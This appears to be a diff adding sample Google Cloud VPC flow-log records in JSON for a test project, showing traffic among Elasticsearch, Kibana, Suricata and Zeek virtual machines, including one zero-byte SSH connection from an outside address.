+{"insertId":"19im82tfdygznx","jsonPayload":{"bytes_sent":"319459","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"180","reporter":"DEST","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo7","jsonPayload":{"bytes_sent":"519100","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60110},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"224","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznb","jsonPayload":{"bytes_sent":"139513","connection":{"dest_ip":"67.43.156.13","dest_port":33550,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"243","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143811431Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzne","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":41822},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:40.058226439Z","packets_sent":"8","reporter":"DEST","rtt_msec":"1439","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"1gq7q7afe373fw","jsonPayload":{"bytes_sent":"11109","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"105","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373et","jsonPayload":{"bytes_sent":"173496","connection":{"dest_ip":"67.43.156.13","dest_port":33970,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821154389Z","packets_sent":"81","reporter":"SRC","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f4","jsonPayload":{"bytes_sent":"182861","connection":{"dest_ip":"10.87.40.76","dest_port":33536,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"245","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373eo","jsonPayload":{"bytes_sent":"12145","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"94","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fb","jsonPayload":{"bytes_sent":"178669","connection":{"dest_ip":"67.43.156.13","dest_port":65319,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"634","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fs","jsonPayload":{"bytes_sent":"62066","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"359","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ei","jsonPayload":{"bytes_sent":"13440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ez","jsonPayload":{"bytes_sent":"368131","connection":{"dest_ip":"67.43.156.13","dest_port":33966,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.800931420Z","packets_sent":"76","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fh","jsonPayload":{"bytes_sent":"66258","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"365","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373es","jsonPayload":{"bytes_sent":"76976","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65276},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"749","reporter":"DEST","rtt_msec":"156","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fu","jsonPayload":{"bytes_sent":"72967","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65319},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"747","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f2","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":50364},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"9","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ee","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.13","dest_port":50364,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"8","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ey","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":33126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373e7","jsonPayload":{"bytes_sent":"73215","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65318},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"747","reporter":"DEST","rtt_msec":"96","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":53096,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ec","jsonPayload":{"bytes_sent":"176465","connection":{"dest_ip":"10.87.40.76","dest_port":33570,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"65","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f5","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":33126,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f6","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":56478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fo","jsonPayload":{"bytes_sent":"32764","connection":{"dest_ip":"67.43.156.14","dest_port":52430,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"228","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ek","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34536,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fj","jsonPayload":{"bytes_sent":"137855","connection":{"dest_ip":"10.87.40.76","dest_port":33572,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"72","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fm","jsonPayload":{"bytes_sent":"125197","connection":{"dest_ip":"10.87.40.76","dest_port":33540,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"242","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373eg","jsonPayload":{"bytes_sent":"917832","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"230","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 